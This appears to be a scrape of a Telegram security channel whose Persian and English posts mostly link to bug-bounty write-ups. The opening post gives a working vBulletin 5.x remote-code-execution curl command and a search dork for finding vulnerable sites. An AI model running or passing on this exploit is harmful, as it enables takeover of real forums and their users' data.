Web_Priv8
762 subscribers
405 photos
24 videos
45 files
588 links
Sina Doosti @r00t98
Web Security Researcher, Bug Hunter
https://twitter.com/r00t98

Amir Hasanvand @al9n3_wolf
Web Security Researcher, Bug Hunter
https://twitter.com/al9n3_wolf
Download Telegram
0day RCE exploit on vBulletin 5xx

dork ; intext:"Powered by vBulletin"
POC
curl -s https://SITE/ajax/render/widget_tabbedcontainer_tab_panel -d 'subWidgets[0][template]=widget_php&subWidgets[0][config][code]=echo%20shell_exec("id"); exit;'

#vbulletin
#rce
#pentest
#web

@sec_nerd
راهکارهایی برای دور زدن Rate Limit



#bugbounty
#pentest


@sec_nerd
لیست جامعی از رایت آپ های کشف باگ در وبسایتهای بزرگ

از سال ۲۰۱۲ تا ۲۰۲۰


https://pentester.land/list-of-bug-bounty-writeups.html


#pentest
#bugbounty


@sec_nerd
به تعداد راه‌های رسیدن به خدا، راه دور زدن مکانیزم‌های امنیتی هم هست.

توی این گزارش، محقق با خوندن مستندات Content-type (یکی از سرآیندهای پروتکل HTTP) تونسته راه‌هایی رو پیدا کنه که می‌شه ازش در دور زدن مکانیزم‌های امنیتی تحت مرورگر و WAFها بهره گرفت.
@offsecmag
This media is not supported in your browser
VIEW IN TELEGRAM
کشف آسیب پذیری RCE در پیام رسان cisco jabber


https://watchcom.no/nyheter/nyhetsarkiv/uncovers-cisco-jabber-vulnerabilities/



این مطلب رو بخونید تا ببینید چطور یک آسیب پذیری XSS به اجرای دستور ختم میشه


#rce
#cisco
#xss


@sec_nerd
Full security assessment for iOS applications

#ios
#BugBounty
#BugBountyTip

@web_priv8
Hacking iOS applications for BugBounty

#ios
#BugBounty
#BugBountyTip

@web_priv8
کشف باگ XSS در google maps و دریافت جایزه ی ۱۰ هزار دلاری


https://www.ehpus.com/post/xss-fix-bypass-10000-bounty-in-google-maps


#bugbounty
#google
#xss


@sec_nerd
سوالات و جواب‌های کامل مسابقه‌ی نفوذ و امنیت گوگل ۲۰۲۰ اینجا آپلود شده. طوری که با منبع کد سوالات می‌تونید خودتون سوال رو بازعمل‌آوری کنید. در زمینه‌های مختلفی از جمله امنیت وب، مهندسی معکوس، اکسپلویتینگ، سخت‌افزار، رمزنگاری و دور زنی سندباکس (کروم) سوالات توزیع شده.
@offsecmag
کشف دوباره آسیب پذیری RCE بر روی یکی از سرویس های فیسبوک توسط Orange Tsai

https://blog.orange.tw/2020/09/how-i-hacked-facebook-again-mobileiron-mdm-rce.html



لینک ویدیو:
https://www.youtube.com/watch?v=hGTLIIOb14A



#facebook
#Bugbounty
#rce


@sec_nerd